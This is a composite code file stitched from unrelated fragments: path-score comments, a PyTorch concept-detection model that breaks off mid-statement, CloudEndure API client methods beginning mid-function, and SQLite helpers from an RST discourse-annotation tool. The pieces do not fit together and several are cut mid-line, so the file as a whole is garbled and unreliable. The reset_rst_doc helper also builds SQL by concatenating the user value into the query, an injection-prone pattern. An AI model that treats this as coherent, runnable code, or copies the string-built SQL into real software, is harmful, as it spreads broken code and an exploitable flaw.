# Score 8 for path: ['N', 'N', 'E', 'N', 'E', 'S', 'S', 'S', 'E', 'N', 'N', 'N']
# A8 B5 C10 D4 D5 D6 F8 G10
# Score 8 for path: ['S', 'S', 'S', 'E', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'S']
# A2 A3 A5 B7 C5 D2 F1 F3
# Score 9 for path: ['S', 'S', 'S', 'E', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 C7 D4 D5 F5
# Score 8 for path: ['S', 'S', 'E', 'S', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 D5 D6 G4
# Score 8 for path: ['S', 'E', 'S', 'S', 'E', 'N', 'N', 'N', 'N', 'E', 'N', 'N']
# A6 A7 B4 B5 D6 D7 G4 G5
# Score 8 for path: ['S', 'E', 'S', 'S', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 D6 G4 G5
# checkExhaustivePathsWithAutoRepairPatterns(16, 6)
# Score 6 for path: ['E', 'N', 'E', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 G8 H5 H7 H8
# Score 6 for path: ['E', 'N', 'W', 'N', 'E', 'N', 'W', 'W', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 F5 F6 H8 I4
# Score 6 for path: ['E', 'N', 'W', 'N', 'E', 'N', 'W', 'W', 'W', 'W', 'W', 'S', 'S', 'E', 'S', 'E']
# E5 E10 F6 H8 I4 I6
# Score 6 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'S', 'E', 'S', 'W', 'S', 'E']
# D4 D5 D10 E10 G5 H5
# Score 6 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# E5 E10 G8 G10 H5 H7
# Score 7 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 G8 G10 H5 H7 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'S', 'E', 'S', 'W', 'S', 'E']
# D4 D5 D10 E9 E10 H5
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# E5 E9 E10 G8 H5 H7
# Score 8 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E9 E10 F6 G8 H5 H7 H8
# Score 7 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'E', 'S', 'E']
# E5 E9 E10 F6 G8 H5 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S']
# E9 E10 F6 G8 H5 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'W', 'N', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E9 E10 F6 H7 H8
# Score 6 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E7 E8 G9 I10
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'N', 'E', 'E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E8 F8 G8 I8
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E7 E8 I8 I10
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'E', 'N', 'W', 'W', 'W', 'N']
# D8 E7 E8 F10 I8 I10
# Score 6 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'W', 'W', 'N', 'N', 'W', 'N', 'E', 'E']
# E2 E7 F5 G2 G5 H7
# Score 7 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'W', 'W', 'N', 'E', 'N', 'W', 'N', 'E']
# D2 D4 D7 E7 F5 G2 H7
# Score 6 for path: ['S', 'W', 'W', 'S', 'W', 'S', 'E', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F4 G1 I2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E', 'E']
# E2 E4 F4 G1 G4 J2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F4 G1 I2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'S', 'E', 'S', 'W', 'W', 'S', 'W', 'S', 'E', 'E']
# E4 F1 F4 G1 I2 J4
# Score 8 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'S', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F1 F4 G1 I2 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'S', 'W', 'S', 'E', 'E']
# E1 E4 F1 G1 I4 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'E', 'E']
# E1 E4 F1 G1 I4 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'E', 'S', 'E']
# E1 E4 F1 G1 I4 J4
# Score 7
"""Model for concept detection, and its training and evaluation handle."""
# Copyright (c) 2020 Continental Automotive GmbH
import hashlib
import logging
from typing import Optional, Tuple, Dict, Any, Sequence, Callable
import numpy as np
import torch
import torch.nn
from .base_handles import EarlyStoppingHandle, ResettableOptimizer, \
TrainEvalHandle
from .model_extension import ModelStump, output_size
from ..concepts import SegmentationConcept2D, ConceptTypes
from ..embeddings import ConceptEmbedding
from ...datasets import DatasetSplit, BaseDataset, ActivationDatasetWrapper, \
DataTriple
from ...datasets.transforms import SameSize, same_padding, TupleTransforms, \
Compose, ToDevice, OnBothSides
LOGGER = logging.getLogger(__name__)
class ConceptDetectionModel2D(torch.nn.Module):
"""Pytorch model implementation of a concept embedding for 2D conv layers.
The model itself is simply a convolutional layer with sigmoid activation.
The goal of this model is to tell, from an activation map, which spatial
"parts" of the activation map belong to a given concept and which do not.
These parts are windows of the concept model :py:attr:`kernel_size`.
The model features training and evaluation functionality for concept
analysis, i.e. for training this concept module on the activation map output
of the given model and layer without changing the main model.
The model forward pass works as follows:
:Input: Activation map output of a 2D convolutional layer.
:Output:
Heatmap showing which centers of boxes of :py:attr:`kernel_size` belong
to :py:attr:`concept`.
The heatmap values are the sigmoid of a convolution operation.
"""
@property
def concept(self) -> Optional[SegmentationConcept2D]:
"""The concept (data) for which this model is/should be trained."""
return self._concept
@property
def concept_name(self) -> str:
"""The name of the associated concept if known."""
return self._concept_name if self.concept is None else self.concept.name
@property
def main_model_stump(self) -> ModelStump:
"""Stump of the main model in the head of which to localize the
concept embedding.
Used to generate the activation maps needed for concept analysis
training. The actual attribute is wrapped into a tuple to hide the
parameters, since these shall not be updated; see
https://discuss.pytorch.org/t/how-to-exclude-parameters-from-model/6151
"""
return self._main_model_stump[0]
@main_model_stump.setter
def main_model_stump(self, main_model_stump: ModelStump) -> None:
"""Setter of :py:attr:`main_model_stump`."""
self._main_model_stump = (main_model_stump,)
@property
def main_model(self) -> torch.nn.Module:
"""Shortcut to access the main model.
It is wrapped by :py:attr:`main_model_stump`.
"""
return self.main_model_stump.wrapped_model \
if self.main_model_stump is not None else None
@property
def layer_id(self) -> str:
"""Layer to extract concept from.
Shortcut to access the information from :py:attr:`main_model_stump`.
"""
return self.main_model_stump.stump_head
@property
def kernel_size(self) -> Tuple[int, ...]:
"""Size of the convolution kernel.
This is the assumed concept size in activation map pixels."""
return self.concept_layer.kernel_size
@property
def in_channels(self) -> int:
"""Number of input channels.
This is the number of output channels of the layer to investigate."""
return self.concept_layer.in_channels
@property
def settings(self) -> Dict[str, Any]:
"""The current model settings as dictionary."""
return dict(
concept=self.concept,
model=self.main_model,
layer_id=self.layer_id,
kernel_size=self.kernel_size,
in_channels=self.in_channels
)
def __init__(self,
concept: Optional[SegmentationConcept2D],
model: Optional[torch.nn.Module], layer_id: Optional[str],
kernel_size: Tuple[int, int] = None, in_channels: int = None,
concept_name: str = None):
# pylint: disable=line-too-long
"""Init.
:param model: model the concept should be embedded in;
used to create (and later accessible in)
:py:attr:`main_model_stump`;
used for :py:attr:`kernel_size` and :py:attr:`in_channels`
auto-inference
:param layer_id: the layer index in
:py:meth:`~torch.nn.Module.state_dict`, the output of which is to
be fed to the the concept model; used to create (and later
accessible) in :py:attr:`main_model_stump`;
used for :py:attr:`kernel_size` and :py:attr:`in_channels`
auto-inference
:param concept: Concept to train for; must be a segmentation concept
featuring ground truth masks; used for :py:attr:`kernel_size` and
:py:attr:`in_channels` auto-inference
:param in_channels: Number of filters of the
:py:class:`~torch.nn.Conv2d`-Layer to analyse;
the value is automatically determined if ``in_channels`` or
``kernel_size`` is ``None``;
an automatically generated value overwrites a given value with a
warning
:param kernel_size: Size in activation map pixels of a window for
which to assess whether it is part of the ``concept`` or not;
by default it is determined by the relative sizes in the concept's
:py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size`
and the layer output size;
if ``concept.rel_size`` is not set, :py:attr:`kernel_size` is set to
``(1, 1)`` with a warning
:param concept_name: The default value for the :py:attr:`concept_name`
property if :py:attr:`concept` is ``None``; serves as ID for
the concept model
"""
# pylint: enable=line-too-long
# Parameter post-processing:
if concept is not None:
concept: SegmentationConcept2D = SegmentationConcept2D.new(concept)
super(ConceptDetectionModel2D, self).__init__()
self._main_model_stump: Tuple[ModelStump] = \
(ModelStump(model, layer_id),) \
if model is not None else (None,)
"""Stump of the main model in the head of which to localize the
concept embedding. Used to generate the activation maps needed for
concept analysis training.
Must be wrapped into a tuple to hide the parameters from being added to
the :py:meth:`torch.nn.Module.state_dict`, since these are not to be
updated."""
self._concept: Optional[SegmentationConcept2D] = concept
"""Internal storage of the concept to localize."""
self._concept_name: Optional[str] = \
self._concept.name if self._concept is not None else concept_name
"""Default value for :py:attr:`concept_name` property
if :py:attr:`concept` is ``None``."""
# automatically determine kernel_size and in_channels if one isn't given
# (this may be time consuming as it requires one run through the model);
# automatic determination is not possible if concept.rel_size is None,
# in this case set the kernel_size to (1,1)
if in_channels is None or kernel_size is None:
if concept is None:
raise ValueError("Concept not given, so cannot auto-infer "
"sizes, but in_channels or kernel_size not "
"given.")
auto_in_channels, auto_kernel_size = \
self._layer_out_info(concept, self.main_model_stump)
if in_channels is not None and in_channels != auto_in_channels:
LOGGER.warning(
"The number of in_channels specified for %s was %d, but the"
" automatically determined value was %d; taking auto one",
self.__class__.__name__, in_channels, auto_in_channels)
in_channels = auto_in_channels
kernel_size = kernel_size \
if kernel_size is not None else auto_kernel_size
# Layers
assert len(kernel_size) == 2, \
"kernel size not of len 2: {}".format(kernel_size)
# Beware: The padding for ZeroPad2d has crude specification:
# 1. width pad, 2. height pad
self.padding = torch.nn.ZeroPad2d(
padding=same_padding((kernel_size[1], kernel_size[0])))
self.concept_layer = torch.nn.Conv2d(in_channels=in_channels,
kernel_size=kernel_size,
out_channels=1)
"""The Conv layer which is trained to detect windows
in which concept is located.
The number of input channels is automatically determined if not given
as ``in_channels`` in the ``__init__`` call.
(automatic determination requires one forward of the main model)."""
self.activation = torch.nn.Sigmoid()
"""The sigmoid activation layer to obtain heatmaps in ``[0,1]``."""
@staticmethod
def _layer_out_info(concept: SegmentationConcept2D,
main_model_stump: torch.nn.Module
) -> Tuple[int, Tuple[int]]:
# pylint: disable=line-too-long
"""Extract channel and kernel size information from model output.
This is done by collecting the layer output size from one forward run
of the model.
It is then assumed that the layer output is a tensor of shape
``(output channels/filters, height, width, ...)``, where
``height, width, ...`` is activation map shape information that
should have the same number of dimensions as the
:py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size` of
the ``concept``, if this is set.
:param main_model_stump: the model of which to analyse the output;
output must be a single tensor with size of shape
``(output channels/filters, width, height, ...)``
:param concept: the concept from which to draw the dummy sample size
and the concept size
:return: tuple of
:in_channels: number of output channels of the layer) and of
:kernel_size:
the size in activation map pixels the kernel must have to
provide (up to rounding) the same aspect ratio as specified
in the :py:attr:`~hybrid_learning.concepts.concepts.SegmentationConcept2D.rel_size`
of the ``concept`` if this is set;
if ``concept.rel_size`` is not set, ``kernel_size`` is ``(1,1)``
"""
# pylint: enable=line-too-long
inp, _ = concept.train_data[0]
# layer output size without batch dimension:
layer_out_size = output_size(main_model_stump, input_size=inp.size())
# Some size checks:
# assuming layer_out_size = batch + (filters, width, height)
if len(layer_out_size) != 3:
raise AttributeError(
("The size of layer {} output was not of shape "
"(filters, width, height), but was {}"
).format(main_model_stump.stump_head, layer_out_size))
# assuming layer_out_size[1:] gives same image dimensions as
# concept.rel_size
if concept.rel_size is not None and len(concept.rel_size) != len(
layer_out_size) - 1:
raise AttributeError(
("The concept size has {} image dimensions, the layer "
"output has {}; concept size: {}, layer out size: {}"
).format(len(concept.rel_size), len(layer_out_size) - 1,
concept.rel_size, layer_out_size))
# in_channels is by default the number of output filters of the layer:
auto_in_channels: int = layer_out_size[0]
# kernel_size is by default the percentage of the layer output size
# given by concept size;
# if concept.rel_size is not set, it is (1,1)
if | |
bool
:param object body: The machine IDs for which to pause replication. (required)
:param str project_id: (required)
:return: CloudEndureMachinesListInvalidIDsAndJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_pause_replication_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_pause_replication_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
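# Usage sketch (illustrative; the exact request-body schema is an assumption and is
# not defined in this module):
#   api.projects_project_id_pause_replication_post(
#       body={"machineIDs": ["machine-id-1", "machine-id-2"]},
#       project_id="project-id")
# The call returns a CloudEndureMachinesListInvalidIDsAndJob describing the spawned
# job and any invalid machine IDs that could not be paused.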
def projects_project_id_pause_replication_post_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Pause replication # noqa: E501
Pause replication for given machines # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_pause_replication_post_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The machine IDs for which to pause replication. (required)
:param str project_id: (required)
:return: CloudEndureMachinesListInvalidIDsAndJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_pause_replication_post" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_pause_replication_post`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_pause_replication_post`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/pauseReplication",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureMachinesListInvalidIDsAndJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_replicas_delete(
self, body, project_id, **kwargs
): # noqa: E501
"""Perform Cleanup # noqa: E501
Spawns a cleanup job to remove the specified target machines from the cloud. Returns the job information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_replicas_delete(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The list of replica IDs to delete (corresponding to the 'replica' field in the machine object). (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_replicas_delete_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_replicas_delete_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_replicas_delete_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Perform Cleanup # noqa: E501
Spawns a cleanup job to remove the specified target machines from the cloud. Returns the job information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_replicas_delete_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object body: The list of replica IDs to delete (corresponding to the 'replica' field in the machine object). (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_replicas_delete" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_replicas_delete`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_replicas_delete`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/replicas",
"DELETE",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_restore_files_post(
self, body, project_id, **kwargs
): # noqa: E501
"""Restore selected files in a backup project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_restore_files_post(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CloudEndureRestoreFilesParameters body: A list of file origins, each origin includes file path, machine id, and pit id. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_restore_files_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_restore_files_post_with_http_info(
body, project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_restore_files_post_with_http_info(
self, body, project_id, **kwargs
): # noqa: E501
"""Restore selected files in a backup project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_restore_files_post_with_http_info(body, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CloudEndureRestoreFilesParameters body: A list of file origins, each origin includes file path, machine id, and pit id. (required)
:param str project_id: (required)
:return: CloudEndureJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ["body", "project_id"] # noqa: E501
all_params.append("async_req")
all_params.append("_return_http_data_only")
all_params.append("_preload_content")
all_params.append("_request_timeout")
params = locals()
for key, val in six.iteritems(params["kwargs"]):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method projects_project_id_restore_files_post" % key
)
params[key] = val
del params["kwargs"]
# verify the required parameter 'body' is set
if "body" not in params or params["body"] is None:
raise ValueError(
"Missing the required parameter `body` when calling `projects_project_id_restore_files_post`"
) # noqa: E501
# verify the required parameter 'project_id' is set
if "project_id" not in params or params["project_id"] is None:
raise ValueError(
"Missing the required parameter `project_id` when calling `projects_project_id_restore_files_post`"
) # noqa: E501
collection_formats = {}
path_params = {}
if "project_id" in params:
path_params["projectId"] = params["project_id"] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if "body" in params:
body_params = params["body"]
# HTTP header `Accept`
header_params["Accept"] = self.api_client.select_header_accept(
["application/json"]
) # noqa: E501
# HTTP header `Content-Type`
header_params[
"Content-Type"
] = self.api_client.select_header_content_type( # noqa: E501
["application/json"]
) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
"/projects/{projectId}/restoreFiles",
"POST",
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type="CloudEndureJob", # noqa: E501
auth_settings=auth_settings,
async_req=params.get("async_req"),
_return_http_data_only=params.get("_return_http_data_only"),
_preload_content=params.get("_preload_content", True),
_request_timeout=params.get("_request_timeout"),
collection_formats=collection_formats,
)
def projects_project_id_reverse_replication_post(
self, project_id, **kwargs
): # noqa: E501
"""Reverse replication direction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.projects_project_id_reverse_replication_post(project_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str project_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
if kwargs.get("async_req"):
return self.projects_project_id_reverse_replication_post_with_http_info(
project_id, **kwargs
) # noqa: E501
else:
(data) = self.projects_project_id_reverse_replication_post_with_http_info(
project_id, **kwargs
) # noqa: E501
return data
def projects_project_id_reverse_replication_post_with_http_info(
self, project_id, **kwargs
): # | |
child, change all children to this relation
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,node_id,doc,project,user))
children = get_children(parent_id,doc,project,user)
for child in children:
if get_rel_type(get_rel(child[0],doc,project,user),doc,project) == "multinuc":
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,child[0],doc,project,user))
else:
generic_query("UPDATE rst_nodes SET relname=? WHERE id=? and doc=? and project=? and user=?",(new_rel,node_id,doc,project,user))
def count_children(node_id,doc,project,user):
count = generic_query("SELECT count(*) FROM rst_nodes WHERE parent=? and doc=? and project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def count_multinuc_children(node_id,doc,project,user):
count = generic_query("SELECT count(rst_nodes.id) FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def get_multinuc_children_lr(node_id,doc,project,user):
lr = generic_query("SELECT min(rst_nodes.left), max(rst_nodes.right) FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return [int(lr[0][0]),int(lr[0][1])]
def get_multinuc_children_lr_ids(node_id,left,right,doc,project,user):
id_left = generic_query("SELECT id FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.left=? and rst_nodes.doc=? and rst_nodes.project=? and user=? ORDER BY rst_nodes.left",(node_id,left,doc,project,user))
id_right = generic_query("SELECT id FROM rst_nodes JOIN rst_relations ON rst_nodes.relname = rst_relations.relname and rst_nodes.doc = rst_relations.doc and rst_nodes.project = rst_relations.project WHERE reltype = 'multinuc' and parent=? and rst_nodes.right=? and rst_nodes.doc=? and rst_nodes.project=? and user=? ORDER BY rst_nodes.left",(node_id,right,doc,project,user))
return id_left[0][0],id_right[0][0]
def count_span_children(node_id,doc,project,user):
count = generic_query("SELECT count(id) FROM rst_nodes WHERE relname = 'span' and parent=? and rst_nodes.doc=? and rst_nodes.project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])
def node_exists(node_id,doc,project,user):
count = generic_query("SELECT count(*) FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(node_id,doc,project,user))
return int(count[0][0])>0
def get_rel_type(relname,doc,project):
if relname=="span" or relname=="":
return "span"
else:
return generic_query("SELECT reltype from rst_relations WHERE relname=? and doc=? and project=?",(relname,doc,project))[0][0]
def delete_node(node_id,doc,project,user):
if node_exists(node_id,doc,project,user):
parent = get_parent(node_id,doc,project,user)
if not get_kind(node_id,doc,project,user) == "edu": # If it's not an EDU, it may be deleted
# If there are still any children, such as rst relations to a deleted span or multinuc, set their parent to 0
old_children = get_children(node_id,doc,project,user)
for child in old_children:
if len(child[0])>0:
update_parent(child[0],"0",doc,project,user)
generic_query("DELETE FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(node_id,doc,project,user))
generic_query("DELETE FROM rst_signals WHERE source=? and doc=? and project=? and user=?",(node_id,doc,project,user))
if not parent=="0":
if not count_children(parent,doc,project,user)>0:
delete_node(parent,doc,project,user)
elif get_kind(parent,doc,project,user)=="span" and count_span_children(parent,doc,project,user)==0: # Span just lost its last span child, delete it
delete_node(parent,doc,project,user)
elif get_kind(parent,doc,project,user)=="multinuc" and count_multinuc_children(parent,doc,project,user)==0: # Multinuc just lost its last multinuc child, delete it
delete_node(parent,doc,project,user)
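# Illustrative example (made-up ids): calling delete_node("15", doc, project, user)
# on a satellite node first sets the parent of any remaining children of "15" to "0",
# removes "15" and its signals, and then recurses upward, e.g. a span parent "16"
# that just lost its last span child is deleted in the same way.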
def insert_parent(node_id,new_rel,node_kind,doc,project,user):
lr = get_node_lr(node_id,doc,project,user)
old_parent = get_parent(node_id,doc,project,user)
old_rel = get_rel(node_id,doc,project,user)
new_parent = str(get_max_node_id(doc,project,user) + 1)
add_node(new_parent,lr[0],lr[1],old_parent,old_rel,"",node_kind,doc,project,user)
update_parent(node_id,new_parent,doc,project,user)
update_rel(node_id,new_rel,doc,project,user)
def reset_rst_doc(doc,project,user):
generic_query("DELETE FROM rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))
generic_query("""INSERT INTO rst_nodes (id, left, right, parent, depth, kind, contents, relname, doc, project, user)
SELECT id, left, right, parent, depth, kind, contents, relname, doc, project, '""" + user + "' FROM rst_nodes WHERE doc=? and project=? and user='_orig'""",(doc,project))
generic_query("DELETE FROM rst_signals WHERE doc=? and project=? and user=?",(doc,project,user))
generic_query("""INSERT INTO rst_signals (source, type, subtype, tokens, doc, project, user)
SELECT source, type, subtype, tokens, doc, project, '""" + user + "' FROM rst_signals WHERE doc=? and project=? and user='_orig'""",(doc,project))
def get_children(parent,doc,project,user):
return generic_query("SELECT id from rst_nodes WHERE parent=? and doc=? and project=? and user=?",(parent,doc,project,user))
def get_max_node_id(doc,project,user):
return generic_query("SELECT max(CAST (id as decimal)) as max_id from rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))[0][0]
def get_max_right(doc,project,user):
return generic_query("SELECT max(right) as max_right from rst_nodes WHERE doc=? and project=? and user=?",(doc,project,user))[0][0]
def get_users(doc,project):
return generic_query("SELECT user from rst_nodes WHERE doc=? and project=? and not user='_orig'",(doc,project))
def generic_query(sql,params):
dbpath = os.path.dirname(os.path.realpath(__file__)) + os.sep +".."+os.sep+"rstweb.db"
conn = sqlite3.connect(dbpath)
with conn:
cur = conn.cursor()
cur.execute(sql,params)
rows = cur.fetchall()
return rows
def export_document(doc, project,exportdir):
doc_users = get_users(doc,project)
for user in doc_users:
this_user = user[0]
rst_out = get_export_string(doc, project, this_user)
filename = project + "_" + doc + "_" + this_user + ".rs3"
f = codecs.open(exportdir + filename, 'w','utf-8')
f.write(rst_out)
def get_export_string(doc, project, user):
rels = get_rst_rels(doc,project)
nodes = get_rst_doc(doc,project,user)
signals = get_signals(doc,project,user)
rst_out = '''<rst>
\t<header>
\t\t<relations>
'''
for rel in rels:
relname_string = re.sub(r'_[rm]$','',rel[0])
